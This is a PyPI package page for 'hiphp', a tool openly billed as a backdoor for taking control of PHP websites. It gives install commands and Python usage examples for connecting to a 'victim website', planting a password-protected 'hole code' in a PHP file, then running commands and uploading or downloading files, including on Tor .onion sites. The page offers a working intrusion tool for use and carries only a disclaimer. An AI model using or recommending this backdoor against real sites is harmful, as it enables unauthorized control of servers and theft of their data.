Skip to main content

hiphp - free & open source project for create a BackDoor to control PHP-based sites.

Project description


hiphp by yasserbdj96

Hiphp

Free & Open source project for create a BackDoor to control PHP-based sites.

Run on Linux/Ubuntu-latest | python 3.7->3.9 Run on Windows-latest | python 3.7->3.9 Run on MacOS-latest | python 3.7->3.9 Test Requirements on Windows-latest | python 3.7->3.9 Test Requirements on Linux/Ubuntu-latest | python 3.7->3.9 PYPI Build & Setup On Linux/Ubuntu-latest | python 3.7->3.9 PYPI Build & Setup On MacOS-latest | python 3.7->3.9 PYPI Build & Setup On Windows-latest | python 3.7->3.9 Install On Linux/Ubuntu-latest | python 3.7->3.9 Push To Docker Push To Github Container Registry Push To PYPI Deploy static content to Pages CodeQL (python, javascript) CodeFactor Supported Versions Visitors Docker pulls Open Source Stars Forks Watching GitHub contributors GitHub closed issues GitHub pull requests GitHub release (latest by date) GitHub commit activity GitHub license Join the chat at https://gitter.im/yasserbdj96/hiphp


What is Hiphp?

The BackDoor of HIPHP allows you to control the websites that are based on PHP using HTTP/HTTPS protocol. It works by sending files, tokens, and commands to the site using port 80's POST/GET method. After placing the HIPHP_HOLE_CODE into any PHP file, it will allow you to access it and perform various activities such as downloading and editing files. It also allows you to connect to tor networks, this BackDoor is a password protected.


Table of Contents:


Demo:


How do you use this version of the project?

[✓] Command Line Interface (CLI).
[✓] Graphical User Interface (GUI).
[✓] Python Package.
[✓] Script.
[✓] Docker Container.

All languages used in this project:

* Python3
* PHP
* Shell (Bash)
* Shell (Batch)
* JavaScript
* CSS
* HTML

Where can you find this project?

[✓] https://pypi.org/project/hiphp/
[✓] https://hub.docker.com/r/yasserbdj96/hiphp
[✓] https://github.com/yasserbdj96/hiphp
[✓] Github Packages
[✓] https://gitlab.com/yasserbdj96/hiphp

used requirements:

[✓] requests
[✓] hexor
[✓] biglibrary
[✓] tk
[✓] eel
[✓] readline
[✓] chardet

Python Package Installation:

# Install from PYPI: pip install hiphp
# OR python -m pip install hiphp

# Local install:
# Download hiphp from github: git clone https://github.com/yasserbdj96/hiphp.git
# OR
# Download hiphp from gitlab: git clone https://gitlab.com/yasserbdj96/hiphp.git
# Go to downloaded folder: cd hiphp
# install pip install -r requirements-pypi.txt
❯ sudo python setup.py install

# Uninstall: pip uninstall hiphp

click to see Demo



Use hiphp As Script:

Script Usage:

from hiphp import *

# Connect:
p1=hiphp(key="<KEY*>",url="<URL*>",lang="<LANG>",retu=<RETURN>)# Default: retu=False

# *      = All inputs must be entered.
# KEY    = The password used for encrypt HIPHP_HOLE_CODE.
# URL    = Victim website link.
# LANG   = based site language, default LANG='php'.
# RETURN = True for return data as a string, false for print data in the console.

Script Examples:

#START{
from hiphp import *

# Connect:
p1=hiphp(key="123",url="http://127.0.0.1/index.php")#Default: retu=False.
#p1=hiphp(key="123",url="http://kfdjlkgjflkgjdfkjgkfdjgkjdfkgjk.onion/index.php")# If you use hiphp on .onion sites, you must run tor services or tor browser.
#p1=hiphp(key="123",url="https://google.com/index.php")

# Get the hole Code:
p1.get_hole()# Copy this code into the file whose path you entered earlier. ex: https://localhost/index.php

# Example:1
# Command:
p1.run("echo 'this is a test';")

# Example:2
# Run code from file:
p1.run_file("./examples.php")# Run code from file.
p1.run_file("./examples.php","var1==true","var2==hiii")# Run code from file With the entry of variables.

# Example:3
# Upload a file:
p1.upload("./examples.php")# Upload a file to the current directory.
p1.upload("./examples.php","./upload_path/")# Upload a file to a specific directory.

# Example:4
# Compress a path:
p1.compress()# Compress the current directory.
p1.compress("./example/")# Compress a specific directory.

# Example:5
# download a file:
p1.download("example.zip")# download a specific file to the current directory.
p1.download("example.zip","<OUT_PATH>")# download a specific file to specific directory.

# Example:6
# Command line interface:
p1.cli()
#}END.

HIPHP_HOLE_CODE Example:

hiphp by yasserbdj96

Screenshots:


Changelog History:

Click to See changelog History

Limitations:

1. When you use hiphp for the first time on a site, the code HIPHP_HOLE_CODE will show you, copy it and upload it to the path you want to connect to, for example 'https://localhost/inc/example.php'.
2. In order for hiphp to work well and without errors, HIPHP_HOLE_CODE must be placed at the top of the target file.
3. hiphp will not work and it will show you a message stating that you are unable to connect to the site if you do not enter the correct path to the location of HIPHP_HOLE_CODE via the link.
4. If you use hiphp on .onion sites, you must run tor services or tor browser.
5. If you are a Windows user, you must modify the "config.ini" file.
6. I AM NOT RESPONSIBLE HOW YOU USE MY TOOLS/PROGRAMS/PROJECTS. BE LEGAL AND NOT STUPID.

Development By:

Developer / Author: yasserbdj96


License:

The content of this repository is bound by the following LICENSE.


Support:

If you like `hiphp` and want to see it improve furthur or want me to create intresting projects , You can buy me a coffee

hiphp by yasserbdj96
BTC: bc1q2dks8w8uurca5xmfwv4jwl7upehyjjakr3xga9



website . github . gitlab . linkedin . twitter . instagram . facebook . youtube . pypi . docker . telegram . gitter . e-mail . sponsor

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

hiphp-0.2.34.tar.gz (31.4 kB view hashes)

Uploaded Source

Built Distribution

hiphp-0.2.34-py3-none-any.whl (28.4 kB view hashes)

Uploaded Python 3

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page